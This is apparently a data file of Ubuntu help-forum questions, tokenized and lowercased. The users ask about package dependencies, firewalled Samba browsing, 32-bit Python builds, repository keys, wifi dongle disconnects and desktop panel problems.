29231	how to fix a broken adobe air package ?	i 'm using 64 bit version of ubuntu 10.10 and have some problems with broken dependencies . i needed adobe air but it was not availble via apt-get , so i downloaded it from adobe and installed . then i succesfully installed adobe air application . it started and works pretty good . however when i start synaptic it claims that i have broken package ( it is my adobe air application with some numbers attached ) . it says that this application requires adobeair package which ca n't be found in repositories and thus it ca n't be installed . but i have it and it works . do you know any workaround ? for example how to tell dpkg that i have adobeair installed , or how to remove my application from list of installed packages ? i have n't installed it via dpkg or apt-get , but with adobe air installer , so i do n't need it to be registred in dkpg however i have adobeair package : dpkg -- list |grep adobeair ii adobeair 2.5.1.17730 adobe air 2 and still apt-get says : someapp.a1909296681c7acefe45687d3a64758c8659bf46.1 : prerequire : adobeair ( > = 2.0.0.0 ) but it ca n't be installed above line was in other language and i translated it to english , so original text can be different .
29233	need help with account setup , e-mail settings	i ca n't get my e-mail account ( a free tiscaly account ) set up , following the video guide to enter some special settings . when i use a gmail account i created for this , it works very well indeed ; most of the information was filled in automatically . can someone help me ? thanks .
29239	where is .bash_profile ?	i want to put new aliases to my .bash_profile file , but i can not find this file . where is it supposed to be ?
29240	how can i use smbclient to connect to windows shares by hostname when a firewall is enabled ?	i ca n't connect to file shares on windows computers using smbclient -l //hostname when the firewall is enabled . this occurs whether i 'm using ufw ( which allows outgoing traffic and replies back in with the default configuration ) or iptables ( where i 'm allowing outgoing traffic and replies back in with iptables -a input -m state -- state established , related -j accept ) . however , smbclient -l //ip-address works whether the firewall is enabled or not . i also tested this against a samba server running on ubuntu and again smbclient -l //hostname does not work when the firewall is enabled , but smbclient -l //ip-address works whether the firewall is enabled or not . for reference , here are the iptables rules i used during testing : *filter : input drop [ 0:0 ] : forward accept [ 0:0 ] : output accept [ 0:0 ] -a input -m state -- state related , established -j accept -a input -p icmp -j accept -a input -d 224.0.0.251/32 -p udp -m udp -- dport 5353 -j accept commit
29242	delete button in ubuntu one notes	for the whishlist ... the 'delete button ' in ubuntu one notes is exactly in the same place as the 'save ' button . so i saved a long note , but as my finger clicked two times on the save button , the second click was on the 'delete ' one ! lost without return possible . < : - ( ( this annoying feature could easily be changed : - put the delete button in another place - before deleting : ask for confirmation - offer a way to cancel ( 'undelete ' function )
29243	how can i increase the text size in empathy chat windows ?	the text that appears in empathy chat windows is quite small , even though i have set the font dpi to a large value in preferences > appearance . there does not appear to be any option to make this larger so that i can read what other people are sending me easily . i 've been using pidgin in the meantime because it is a little better in this respect . i would be grateful for any tips on how to increase the text size in empathy chat windows , even if this involves clever .gtkrc-2.0 hacks . thanks !
29244	problem manipulating text using grep	i want to search for a line that contains log4j and take 7 lines before and 3 lines after the match . grep -b7 -a3 `` log4j '' web.xml after that i want to add comment tags before this paragraph and after it . < ! -- paragraph that i found by grep -- > i wrote this script bellow : search=`find . -name 'web.xml'` text=`grep -b7 -a3 `` log4j '' $ search` sed -i `` / $ text/c $ newparagraph '' $ search it 's not working . is there any way to just add comment symbol not replace the paragraph ? what i want to the script to do : search for the paragraph append append -- > at the end edit : this is the paragraph that am trying manipulate : < context-param > < param-name > log4jconfiglocation < /param-name > < param-value > /web-inf/classes/log4j.properties < /param-value > < /context-param > < listener > < listenerclass > org.springframework.web.util.log4jconfiglistener < /listener-class > < /listener > this paragraph is part of many paragraphs ! i want make it like this : < ! -- < context-param > < param-name > log4jconfiglocation < /param-name > < param-value > /web-inf/classes/log4j.properties < /param-value > < /context-param > < listener > < listenerclass > org.springframework.web.util.log4jconfiglistener < /listener-class > < /listener > -- >
29245	how can i change the tooltip color or font in ambiance ?	i 'm using the ambiance theme in ubuntu 10.04 which i am generally quite happy with but i would like to change the tooltip color or font . i sometimes find it hard to make out the white text on the black background , so i would like to be able to change this to make it more readable . so how can i change the tooltip color or font in the ambiance theme ?
29247	how to install subversion server	i 'd like to install a subversion server on my ubuntu machine . what packages to i need ? how do i create a repository and set a new user ?
29251	how to start contributing to unity ?	i just forked the source code of unity . i am new to contributing to the project . do unity developers use any specific ide ? i am asking this because i am confused about where to start and how exactly do i check a change after i do it ? should i recompile entire natty ? if so , then how ? i know i am asking a lot of questions , but it would be really helpful if someone could write some kind of beginner friendly introduction to unity development .
29252	the side usb ports do n't work on my apple wired keyboard	i 'm trying to use my apple wired keyboard 's usb ports , however ubuntu refuses to pick up anything and dmesg does n't tell me anything either . many thanks will be appreciated , joe
29253	how can i install a 32bit python on 64 bit ubuntu	i am using ubuntu 10.10 ( linux pc07 2.6.35-27-generic # 48-ubuntu smp tue feb 22 20:25:46 utc 2011 x86_64 gnu/linux ) and the default python package ( python 2.6.6 ) . i would like to install python-psyco to improve the performance of one of my scripts , but only python-psyco-doc is available for 64 bit . i tried a virtual machine , but the the performance boost is much less on the virtual machine than on a `` real '' installed 32-bit ubuntu . so my question is : how can i install a 32bit python with psyco on my 64bit ubuntu machine ? edit : i 've found this article and made this : download `` python 2.7.1 bzipped source tarball '' from http : //python.org/download/ go in the directory where you decompressed `` python 2.7.1 '' opt=-m32 ldflags=-m32 ./configure -- prefix=/opt/pym32 make but i got this error : gcc -pthread -m32 -xlinker -export-dynamic -o python \ modules/python.o \ libpython2.7.a -lpthread -ldl -lutil -lm libpython2.7.a ( posixmodule.o ) : in function `posix_tmpnam ' : /home/moose/downloads/python-2.7.1/./modules/posixmodule.c:7346 : warning : the use of `tmpnam_r ' is dangerous , better use `mkstemp' libpython2.7.a ( posixmodule.o ) : in function `posix_tempnam ' : /home/moose/downloads/python-2.7.1/./modules/posixmodule.c:7301 : warning : the use of `tempnam ' is dangerous , better use `mkstemp' segmentation fault make : *** [ sharedmods ] fehler 139 edit2 : now i 've found http : //indefinitestudies.org/2010/02/08/how-to-build-32-bit-python-on-ubuntu-9-10-x86_64/ and it seems like this worked : cd python-2.7.1 cc= '' gcc -m32 '' ldflags= '' -l/lib32 -l/usr/lib32 \ -lpwd/lib32 -wl , -rpath , /lib32 -wl , -rpath , /usr/lib32 '' \ ./configure -- prefix=/opt/pym32 make sudo make install but installing psyco did n't work : download the lastest snapshot : http : //psyco.sourceforge.net/download.html extract it and go into the folder python setup.py install this error appeared : processor = 'ivm' running install running build running build_py running build_ext building 'psyco._psyco ' extension gcc -pthread -fno-strict-aliasing -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -fpic -dall_static=1 -ic/ivm -i/usr/include/python2.6 -c c/psyco.c -o build/temp.linux-x86_64-2.6/c/psyco.o in file included from c/psyco.c:1 : c/psyco.h:9 : fatal error : python.h : datei oder verzeichnis nicht gefunden compilation terminated . error : command 'gcc ' failed with exit status 1 installing the package python-dev solved the problem , but i still could not use psyco . now i 've installed a 32bit ubuntu system .
29254	ubuntu 10.10 freezes	i have the following configuration : cpu : amd athlon 64bit motherboard : phoenix with awardbios v6.0 apic mode = disabled video card : geforce 5500 sound card : soundblaster live 24bit ram : 1.5gb partitions : ext3 32gb where i installed ubuntu . swap 500mb . 180gb fat32 unmounted . contains data only . i installed ubuntu 10.10 and used the `` additional driver '' program to get the nvidia proprietary drivers . the system works for sometime and randomly freezes . the mouse and keyboard are not responding and i am not able to do a ssh . the only solution is pressing the power button . i tried kubuntu 10.10 and 32/64-bits versions as well . there is nothing in the logs to suggest what the reason might be . any help will be appreciated . thanks in advance . here are the logs : xorg.log kern.log messages.log syslog.log
29257	install opera on 64-bit	i tried to follow the instructions on the opera page , but it did n't work . i was assuming the base install should be the same for 64-bit , but it does n't look so . after executing wget -qo - http : //deb.opera.com/archive.key | sudo apt-key add - successfully sudo apt-get install opera says reading package lists ... done building dependency tree reading state information ... done package opera is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'opera ' has no installation candidate below on the page i see a 64 bit linux version is available , you should get it automatically either from the repositories or from opera i have n't tried to download it manually , since i prefer to get it from a repo . it it possible ?
29264	what is the /etc/apt/sources.list file supposed to look like for 10.10 ?	i accidentally deleted /etc/apt/sources.list . now apt-get update does n't quite get as much good stuff as it 's supposed to . please , somebody , paste contents of your /etc/apt/sources.list so that i can copy- & -paste it back . i 'm on kubuntu 10.10 .
29268	can i perform a distribution upgrade without rebooting ?	i would , ideally , like to run a distribution upgrade that does n't end in a complete reboot of the machine ( owing to an irritation in my hardware that requires a period of disconnection from the power supply before my ssd can be detected ) . what would be the procedure for doing this from a desktop environment ? i would image : dist-upgrade shutdown all graphical services restart x i 'd appreciate any advice ( particularly on the exact procedure for step 2 , if this correct ) . nb . i 'm using ksplice for in-memory kernel patching , so the kernel is already dealt with . many thanks , martin
29269	change x settings to boot into laptop with non working screen using an external monitor	my laptop committed suicide . is there a way i can boot into my ubuntu using an external screen ? ubuntu 10.10 video : nvidia 9500 gm i think i can get dual screen upto and until the ubuntu login screen at which point it goes back into laptop display only . then i can just type and enter my password . the system ( i assume boots into ubuntu ) but i got no way of going onto the x or nvidia settings to change my display to external monitor edit well i booted into terminal using control shift f1 i think , and now i 'm trying to reporgram x.org , but strangely it seems bland with not a lot of settings in it edit 2 xrandr returns `` ca n't open display '' edit 3 after some messing around with xrandr and xinit ... my x.org only displays one monitor instead of two in its settings although both , i.e . the laptop and external screens are both connected . edit 4 it seems that x.org now has a `` screen '' and `` monitor '' section , i ca n't seem to be able to boot linux into monitor . i get a `` monitor is not a valid keyword '' in this subsection
29276	what is the best way to record audio into my desktop ?	i asked yesterday about how to configure audacity , which i found out does n't work right with pulse audio . i have since removed them and am looking for the best way to set up a daw on my desktop .
29280	why is my ubuntu 10.10 cd not booting ?	i have downloaded ubuntu 10.10 and burned the iso but it will not boot . i discarded problems with the iso , as i 've downloaded from the official website with no errors , and burned it with no errors . i discarded problems with the burning , as looks like it was recorded with no errors here and later in another computer . i discarded problems with my dvd reader as other cds boots fine . i 'm currently using ubuntu 9.10 , i know i can upgrade via internet , but i have this same problem with my windows xp cd , so i really would like to discover what 's going on here.. my ubuntu 9.10 cd boots just right , but the new one not . what else can be ? or what more precise tests can i make to discover where 's the problem ? -- more info what happens when i try to boot with the ubuntu 10.10 cd is that it behaves like there 's no bootable cd in the drive . it just do n't find the boot on the cd , and start the hd system . my notebook is an amazon pc intel celeron 1.5 with 2gb memory , a dvd-rw driver , hd samsung with 260gb . -- update if you put the media agains the light and see the other side , does that means that it 's a bad quality dvd media ? ( it 's a philips )
29281	openoffice presentation change slide by clicking slides	is it possible to change slides in dual screen mode by clicking the slide on the left monitor ? for instance , if the slide view is on the left screen , and the full-screen is on the right screen . i could do this on windows , but can not see how to do this with ubuntu .
29282	video files ( avi ) tags editor ?	i would like to change tags of ordinary video files ( avi container ) . are there any video file ( avi ) tag editors available in ubuntu ?
29283	high end mobile workstations with pointer stick	i am looking for a list of higher end mobile workstations that run ubuntu/kubuntu well and also have a hardware pointer stick . here 's an illustration of one ( from sciencesurvivalblog ) : i would n't mind getting a macbook pro and wiping it but they refuse to use pointer sticks and to me , they are extremely efficient . i see a lot of potential for lenovo thinkpads as well . system 76 said they have no plans to implement a hardware pointer stick so that leaves them out as well . any ideas ?
29284	how do i mount shared folders in ubuntu using vmware tools ?	experts . i 've successfully installed vmware tools for ubuntu . everything seems to work fine , but shared folders were not mounted automatically . how do i get them to work ? if i run vmware-hgfsclient in terminal , i get the list of shared folders , but ls -l /mnt/hgfs is empty . actually there 's no hgfs dir in /mnt . i know i should probably use the vmware-hgfsclient tool , but i realy do n't know how . p.s . i would n't ask if i could understand the vmware-hgfsclient help i 've read . any suggestions ?
29285	how to remove outlines around windows when switching with alt+tab ?	when i switch windows on current unity using alt+tab , i get an ugly outline of size of the selected window occasionally showing on random places . is there a way to change this outline to something better looking or eliminate it altogether ? nb these outlines appear on ubuntu desktop without any effects enabled . outlined firefox outlined nautilus outlined terminal click on the images to better view the outlines in question .
29286	how to auto add to /etc/resolv.conf ?	on ubuntu 10.04 server , you can edit a file and it will automatically add a nameserver to the /etc/resolv.conf on boot . unfortunately , ubuntu 10.04 desktop does not have this feature that i 'm aware of , although perhaps i could be wrong . see , as a web developer , i replace my localhost domain with `` me.com '' ( since i never use me.com ) in my /etc/hosts file . so , i can visit my own web server this way . but since my /etc/resolv.conf does n't have nameserver 127.0.0.1 in it , every lookup has to go out to my slow isp dns lookup and then back . so , i edit the file manually , but every time i reboot , the connection gets lost , and every time my isp has troubles and my system renegotiates afterwards , i have to type this entry in again . oh , and i prefer that the nameserver 127.0.0.1 be first , not last . note without this entry , every connection to me.com is slow . with this entry , my connection to me.com is super fast . is there a way to automatically do this on boot ?
29287	is there any time tracker that is aware of unity workspaces ?	hamster is unable to detect my four unity 3d workspaces : is there currently any time tracker that can ?
29291	bbc flash videos do n't play in firefox ( youtube videos do , and all is fine in chrome )	ubuntu 10.10 , 32 bit . firefox 3.6.14 why do n't bbc videos play in firefox if youtube has no problem ? moreover videos play fine in chrome . another strange thing : there seem to be two flashplugins in about : plugins file : libflashplayer.so version : shockwave flash 10.1 r102 file : libflashplayer.so version : shockwave flash 10.2 r152 but there is only one flashplugin in the plugins directory : /usr/lib/firefox/plugins/flashplugin-alternative.so - > /etc/alternatives/firefox-flashplugin $ update-alternatives -- list firefox-flashplugin /usr/lib/flashplugin-installer/libflashplayer.so any ideas ?
29293	can not type backquote or backtick in xterm	ubuntu 10.10 , 32 bit , xterm ( 261 ) , keyboard layout = canadian somehow , the backquote ( backtick = ` ) character ca n't be input does not get entered in xterm . i type it and nothing happens . the cursor does not move forward . nor can i type the è ( e with grave ) . this is normally input by typing the backtick followed by an e. i can type the accented é into xterm as it is a key on the keyboard . i know it works because i can input the ` backtick and è etc in terminal ( gnome-terminal ) . i do n't want to change the keyboard layout . termcap ? terminfo ? maybe that has something to do with it ... something is intercepting that backtick ... all other special characters can be input without problem . someone please help me solve this mystery . i like to use xterm and i need the backquotes .
29297	does the compiz cube plugin work with unity ?	i ca n't currently enable compiz cube . it conflicts with the desktop wall plugin , and that plugin is required for unity . can this be fixed ?
29303	uppercase 'p ' appearing as a block	i 've had this problem intermittently for a while . it seems to occur after the endless ubuntu updates , then i fix it . then it comes back again . recently it effected several characters , now ( as of last restart ) it 's only uppercase p from the 'ubuntu ' font that is effected . any ideas on solutions ? bonus points for identifying the cause ! i 've tried the standard sudo fc-cache -fv but no luck this time . i 'm on ubuntu 10.10
29306	error when trying to compile abgx360 : c++ compiler can not create executables	i am trying to compile the abgx360 gui . first i run home/eric/desktop/abgx360-1.0.5/configure but i receive this error : checking for c++ compiler default output file name ... configure : error : c++ compiler can not create executables see `config.log ' for more details . then i run make but i receive this error : make : * no rule to make target `/home/eric/desktop/abgx360-1.0.5/makefile.am ' , needed by `/home/eric/desktop/abgx360-1.0.5/makefile.in ' . stop . here is my 'config.log ' : this file contains any messages produced by compilers while running configure , to aid debugging if configure makes a mistake . it was created by abgx360gui configure 1.0.2 , which was generated by gnu autoconf 2.61 . invocation command line was $ /home/eric/desktop/abgx360gui-1.0.2/configure # # -- -- -- -- - # # # # platform . # # # # -- -- -- -- - # # hostname = eric-desktop uname -m = x86_64 uname -r = 2.6.35-27-generic uname -s = linux uname -v = # 48-ubuntu smp tue feb 22 20:25:46 utc 2011 /usr/bin/uname -p = unknown /bin/uname -x = unknown /bin/arch = unknown /usr/bin/arch -k = unknown /usr/convex/getsysinfo = unknown /usr/bin/hostinfo = unknown /bin/machine = unknown /usr/bin/oslevel = unknown /bin/universe = unknown path : /usr/local/sbin path : /usr/local/bin path : /usr/sbin path : /usr/bin path : /sbin path : /bin path : /usr/games # # -- -- -- -- -- - # # # # core tests . # # # # -- -- -- -- -- - # # configure:1800 : checking for a bsd-compatible install configure:1856 : result : /usr/bin/install -c configure:1867 : checking whether build environment is sane configure:1910 : result : yes configure:1938 : checking for a thread-safe mkdir -p configure:1977 : result : /bin/mkdir -p configure:1990 : checking for gawk configure:2020 : result : no configure:1990 : checking for mawk configure:2006 : found /usr/bin/mawk configure:2017 : result : mawk configure:2028 : checking whether make sets $ ( make ) configure:2049 : result : yes configure:2302 : checking for g++ configure:2332 : result : no configure:2302 : checking for c++ configure:2332 : result : no configure:2302 : checking for gpp configure:2332 : result : no configure:2302 : checking for acc configure:2332 : result : no configure:2302 : checking for cc configure:2332 : result : no configure:2302 : checking for cxx configure:2332 : result : no configure:2302 : checking for cc++ configure:2332 : result : no configure:2302 : checking for cl.exe configure:2332 : result : no configure:2302 : checking for fcc configure:2332 : result : no configure:2302 : checking for kcc configure:2332 : result : no configure:2302 : checking for rcc configure:2332 : result : no configure:2302 : checking for xlc_r configure:2332 : result : no configure:2302 : checking for xlc configure:2332 : result : no configure:2360 : checking for c++ compiler version configure:2367 : g++ -- version > & 5 /home/eric/desktop/abgx360gui-1.0.2/configure : line 2368 : g++ : command not found configure:2370 : $ ? = 127 configure:2377 : g++ -v > & 5 /home/eric/desktop/abgx360gui-1.0.2/configure : line 2378 : g++ : command not found configure:2380 : $ ? = 127 configure:2387 : g++ -v > & 5 /home/eric/desktop/abgx360gui-1.0.2/configure : line 2388 : g++ : command not found configure:2390 : $ ? = 127 configure:2413 : checking for c++ compiler default output file name configure:2440 : g++ conftest.cpp > & 5 /home/eric/desktop/abgx360gui-1.0.2/configure : line 2441 : g++ : command not found configure:2443 : $ ? = 127 configure:2481 : result : configure : failed program was : | /* confdefs.h . */ | # define package_name `` abgx360gui '' | # define package_tarname `` abgx360gui '' | # define package_version `` 1.0.2 '' | # define package_string `` abgx360gui 1.0.2 '' | # define package_bugreport `` '' | # define package `` abgx360gui '' | # define version `` 1.0.2 '' | /* end confdefs.h . */ | | int | main ( ) | { | | ; | return 0 ; | } configure:2488 : error : c++ compiler can not create executables see `config.log ' for more details . # # -- -- -- -- -- -- -- -- # # # # cache variables . # # # # -- -- -- -- -- -- -- -- # # ac_cv_env_ccc_set= ac_cv_env_ccc_value= ac_cv_env_cc_set= ac_cv_env_cc_value= ac_cv_env_cflags_set= ac_cv_env_cflags_value= ac_cv_env_cppflags_set= ac_cv_env_cppflags_value= ac_cv_env_cpp_set= ac_cv_env_cpp_value= ac_cv_env_cxxflags_set= ac_cv_env_cxxflags_value= ac_cv_env_cxx_set= ac_cv_env_cxx_value= ac_cv_env_ldflags_set= ac_cv_env_ldflags_value= ac_cv_env_libs_set= ac_cv_env_libs_value= ac_cv_env_build_alias_set= ac_cv_env_build_alias_value= ac_cv_env_host_alias_set= ac_cv_env_host_alias_value= ac_cv_env_target_alias_set= ac_cv_env_target_alias_value= ac_cv_path_install='/usr/bin/install -c' ac_cv_path_mkdir=/bin/mkdir ac_cv_prog_awk=mawk ac_cv_prog_make_make_set=yes # # -- -- -- -- -- -- -- -- - # # # # output variables . # # # # -- -- -- -- -- -- -- -- - # # aclocal= ' $ { shell } /home/eric/desktop/abgx360gui-1.0.2/missing -- run aclocal-1.10' amdepbackslash= '' amdep_false= '' amdep_true= '' amtar= ' $ { shell } /home/eric/desktop/abgx360gui-1.0.2/missing -- run tar' autoconf= ' $ { shell } /home/eric/desktop/abgx360gui-1.0.2/missing -- run autoconf' autoheader= ' $ { shell } /home/eric/desktop/abgx360gui-1.0.2/missing -- run autoheader' automake= ' $ { shell } /home/eric/desktop/abgx360gui-1.0.2/missing -- run automake-1.10' awk='mawk' cc= '' ccdepmode= '' cflags= '' cpp= '' cppflags= '' cxx='g++' cxxdepmode= '' cxxflags= '' cygpath_w='echo' defs= '' depdir= '' echo_c= '' echo_n='-n' echo_t= '' egrep= '' exeext= '' grep= '' install_data= ' $ { install } -m 644' install_program= ' $ { install } ' install_script= ' $ { install } ' install_strip_program= ' $ ( install_sh ) -c -s' ldflags= '' libobjs= '' libs= '' ltlibobjs= '' makeinfo= ' $ { shell } /home/eric/desktop/abgx360gui-1.0.2/missing -- run makeinfo' objext= '' package='abgx360gui' package_bugreport= '' package_name='abgx360gui' package_string='abgx360gui 1.0.2' package_tarname='abgx360gui' package_version='1.0.2' path_separator= ' : ' set_make= '' shell='/bin/bash' strip= '' version='1.0.2' wx_cflags= '' wx_cflags_only= '' wx_config_path= '' wx_cppflags= '' wx_cxxflags= '' wx_cxxflags_only= '' wx_libs= '' wx_libs_static= '' wx_rescomp= '' wx_version= '' ac_ct_cc= '' ac_ct_cxx= '' am__fastdepcc_false= '' am__fastdepcc_true= '' am__fastdepcxx_false= '' am__fastdepcxx_true= '' am__include= '' am__isrc= ' -i $ ( srcdir ) ' am__leading_dot= ' . ' am__quote= '' am__tar= ' $ { amtar } chof - `` $ $ tardir '' ' am__untar= ' $ { amtar } xf -' bindir= ' $ { exec_prefix } /bin' build_alias= '' datadir= ' $ { datarootdir } ' datarootdir= ' $ { prefix } /share' docdir= ' $ { datarootdir } /doc/ $ { package_tarname } ' dvidir= ' $ { docdir } ' exec_prefix='none' host_alias= '' htmldir= ' $ { docdir } ' includedir= ' $ { prefix } /include' infodir= ' $ { datarootdir } /info' install_sh= ' $ ( shell ) /home/eric/desktop/abgx360gui-1.0.2/install-sh' libdir= ' $ { exec_prefix } /lib' libexecdir= ' $ { exec_prefix } /libexec' localedir= ' $ { datarootdir } /locale' localstatedir= ' $ { prefix } /var' mandir= ' $ { datarootdir } /man' mkdir_p='/bin/mkdir -p' oldincludedir='/usr/include' pdfdir= ' $ { docdir } ' prefix='none' program_transform_name= 's , x , x , ' psdir= ' $ { docdir } ' sbindir= ' $ { exec_prefix } /sbin' sharedstatedir= ' $ { prefix } /com' sysconfdir= ' $ { prefix } /etc' target_alias= '' # # -- -- -- -- -- - # # # # confdefs.h . # # # # -- -- -- -- -- - # # # define package_name `` abgx360gui '' # define package_tarname `` abgx360gui '' # define package_version `` 1.0.2 '' # define package_string `` abgx360gui 1.0.2 '' # define package_bugreport `` '' # define package `` abgx360gui '' # define version `` 1.0.2 '' configure : exit 77
29313	picasa installs but is missing in the menu	acer aspire one netbook ubuntu netbook remix 10.10 ( freshly installed ) 1 gb ram 150 gb hdd space when i try to install picasa , it apparently completes , and tells me that it has been installed . but when i try to look for picasa to run it , it does n't appear in the menu anywhere . i am unable to find picasa on my system and it says that it has been installed already when i try to reinstall it . i have tried a few things ; looked for the key : wget -q -o - https : //dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add - ... and then added it . tried the following commands after adding picasa to my source list : sudo apt-get upgrade sudo apt-get install picasa and here is the result : netbook : ~ $ sudo apt-get install picasa reading package lists ... done building dependency tree reading state information ... done picasa is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . and when i tried to look for picasa again ... i ca n't find it . ( i had also started this thread on ubuntu forums but did n't get a solution . ) i tried jorge 's solution and it did launch picasa immediately , however i am unable to keep it in the launcher . there is no such option . all i can see is only 2 options : 1 . wine 2 . quit so , i still need help to keep it in the menu/launcher .
29316	steps to diagnose snu5600 disconnection problem	i have a philips snu5600 wifi dongle plugged into two machines ( ie i have two snu5600 dongles , one in each machine ) . one machine is running 10.10 and the other is running linux mint . the dongles work absolutely fine , except if i do a lot of file transfers to a nas attached to the wireless router . after a while the connection to the router will go . to get the connection back i either need to run sudo /etc/init.d/networking restart or i need to unplug and plug in again the dongle . otherwise the dongle works fine ( web browsing , streaming , etc ) . output of lsusb : bus 002 device 003 : id 0471:1236 philips ( or nxp ) snu5600 802.11bg output of lsusb -v at http : //pastebin.com/dxykkf01 what steps should i take next to resolve this ? is it a known problem ? could it be the router ? it is a 3com `` officeconnect wireless 11g cable/dsl gateway version 1.02.15 '' . edit i am in france and the dongle was configured for the us region . i used the following command to change this : sudo iw reg set fr this may have made things better , but i ca n't be certain . edit 2 disconnect happened at 19:48 and i reconnected at 20:00 - i have some logs : /var/log/debug http : //pastebin.com/sab4mppb /var/log/messages http : //pastebin.com/qehal9sj this happened in debug when the disconnect happened : mar 9 19:36:54 rich-pc kernel : [ 211.824126 ] cfg80211 : found new beacon on frequency : 2467 mhz ( ch 12 ) on phy0 mar 9 19:48:26 rich-pc kernel : [ 904.483214 ] no probe response from ap 00:0d:54:9e:71 : b8 after 500ms , disconnecting . mar 9 19:48:27 rich-pc kernel : [ 904.711404 ] cfg80211 : all devices are disconnected , going to restore regulatory settings mar 9 19:48:27 rich-pc kernel : [ 904.711412 ] cfg80211 : restoring regulatory settings while preserving user preference for : fr and this covers messages at the same time plus when i unplugged and plugged in the dongle : mar 9 20:00:22 rich-pc kernel : [ 1619.685072 ] usb 1-3 : usb disconnect , address 2 mar 9 20:00:26 rich-pc kernel : [ 1623.630015 ] usb 1-3 : new high speed usb device using ehci_hcd and address 3 mar 9 20:00:26 rich-pc kernel : [ 1623.930015 ] usb 1-3 : reset high speed usb device using ehci_hcd and address 3 mar 9 20:00:26 rich-pc kernel : [ 1624.082780 ] zd1211rw 1-3:1.0 : phy1 mar 9 20:00:26 rich-pc kernel : [ 1624.133849 ] zd1211rw 1-3:1.0 : firmware version 4725 mar 9 20:00:26 rich-pc kernel : [ 1624.173847 ] zd1211rw 1-3:1.0 : zd1211b chip 0471:1236 v4810 high 00-1d-19 al2230_rf pa0 g -- ns mar 9 20:00:26 rich-pc kernel : [ 1624.176228 ] cfg80211 : calling crda for country : us mar 9 20:00:26 rich-pc kernel : [ 1624.179328 ] cfg80211 : current regulatory domain intersected : mar 9 20:00:26 rich-pc kernel : [ 1624.179332 ] ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) mar 9 20:00:26 rich-pc kernel : [ 1624.179335 ] ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) mar 9 20:00:26 rich-pc kernel : [ 1624.179338 ] ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( n/a , 1700 mbm ) mar 9 20:00:26 rich-pc kernel : [ 1624.179340 ] ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) mar 9 20:00:26 rich-pc kernel : [ 1624.179343 ] ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) mar 9 20:00:26 rich-pc kernel : [ 1624.179345 ] ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) mar 9 20:00:26 rich-pc kernel : [ 1624.233713 ] addrconf ( netdev_up ) : wlan0 : link is not ready it looks like this is a known problem with the driver in question . any ideas whether this is likely to be fixed in the next release of ubuntu ?
29318	can it be harmful to grant jackd realtime priority ?	i am apt-get installing ardour , a sound mixing program , just to try it out . installing ardour also installs jack , a dependency . as part of the jack installation script , i get the following dialog : if you want to run jackd with realtime priorities , the user starting jackd needs realtime permissions . accept this option to create the file /etc/security/limits.d/audio.conf , granting realtime priority and memlock privileges to the audio group . running jackd with realtime priority minimizes latency , but may lead to complete system lock-ups by requesting all the available physical system memory , which is unacceptable in multi-user environments . enable realtime process priority ? i 'm installing on my laptop , which never has multiple simultaneous users . i still have concerns : is jack something that 'll be used by the system itself to play any sound ( i.e . will it replace alsa ) ? if so , does that mean that if i enable realtime priority for jack , i 'll run a slight risk of freezing the machine whenever any sound is played ? or is jack only going to be used by ardour for now ( until i install some other jack-dependent program ) ?
29319	how to add a custom launcher in unity 's applications place	i can drag any .desktop file to the launcher , which is great , but where to put a .desktop file for it to appear in unity 's dash and dash searches ? apparently not in /usr/share/applications .
29322	how do i upgrade from inside a vmware image ?	i am running 10.04 within windows 7 , as a virtual machine using vmware . i want to upgrade to 10.10 now and later 11.04 . can i do this using the usual upgrade procedure ( from the update manager ) ? or do i need to do something special ? thnx - egon .
29323	right-to-left script fail with flash player	i am continuing an abandoned thread arabic reading error , since it was not solved . i 'm using ubuntu 10.04 , firefox 3.6.14 . i 've checked for flash player , i have the recent version installed . in the flash player window arabic script appears in wrong direction . the letters are displayed from left to right and not , as it should be , from right to left . for exemple http : //www.fpnp.net/ . the problematic place is the black bar in flash window with a text below the image on the right . here the letters are displayed in wrong direction and , by consequence , are not joined . you can see ( i hope ) the difference between that black bar and the rest of the text . hope it will understandable for not arabic-speaking people . thanks
29327	why is n't my 11.04 system being upgraded ? ( because i want to test the latest code for unity )	i 'm currently running natty , but whenever i do a sudo apt-get update , and then sudo apt-get dist-upgrade , it does n't update nothing , and this has been happening for a couple of months now . thanks for any help . ( i ca n't put my sources.list because askubuntu does n't let me , due to all the hyperlinks ... )
29328	how do i increase the text size of the text on a console ?	i have ubuntu-server on my server and also in terminals and an application squeegee in text mode . this version 9.10 of ubuntu-serversystem came with a resolution at the terminal , which makes use of the application , the fonts ( letters ) are very small . please , if anyone knows how to take the resolution of text mode 10.04 ubuntu server , tell me . to illustrate . i need the resolution is to get as debian , large fonts ! still using version 9.04 , it was the last that still has not implemented the resolution at the terminal ( text mode ) . i remind you that non-use graphical interface . only text mode .
29329	ca n't add to panel nor delete panel	i can not add any applet to any ( top or bottom ) panel , can not delete any panel nor create a new panel . when i right-click on the panel the only options available are : properties , help or about panels . [ i can not post an image because of spam prevention , so i 'll do my best ] i can see when i right-click ( bold means clickable ) : add to panel properties delete this panel new panel help about panels trying to solve this i did what is usually suggested : gconftool-2 â-recursive-unset /apps/panel # might be optional rm -rf ~/.gconf/apps/panel pkill gnome-panel but i only got a nice empty panel ( no applications places system , no clock , no shutdown button ... ) to which i could n't add any applet , so i decided to take the default profiles in .gconf and .gconfd from a live cd and overwrite mines . now we are back to the beginning . i also have tried to lock completely the panel ( with both gconf-editor and pessulus ) and later unlock it completely but it did n't work . here is the system information : $ lsb_release distributor id : ubuntu description : ubuntu 10.04.2 lts release : 10.04 codename : lucid thank you very much .
29335	/dev/loop0 does n't have enough disk space	i have too little space in my /dev/loop0 : /dev/loop0 5,6g 5,1g 170m 97 % / none 3,0g 268k 3,0g 1 % /dev none 3,0g 1,5m 3,0g 1 % /dev/shm none 3,0g 144k 3,0g 1 % /var/run none 3,0g 0 3,0g 0 % /var/lock /dev/sda5 16g 9,5g 6,2g 61 % /host /dev/sdb1 373g 373g 130m 100 % /media/disco externo-1 how can i expand the space for /dev/loop0 ? basically , the system is always warning about lack of space . thanks .
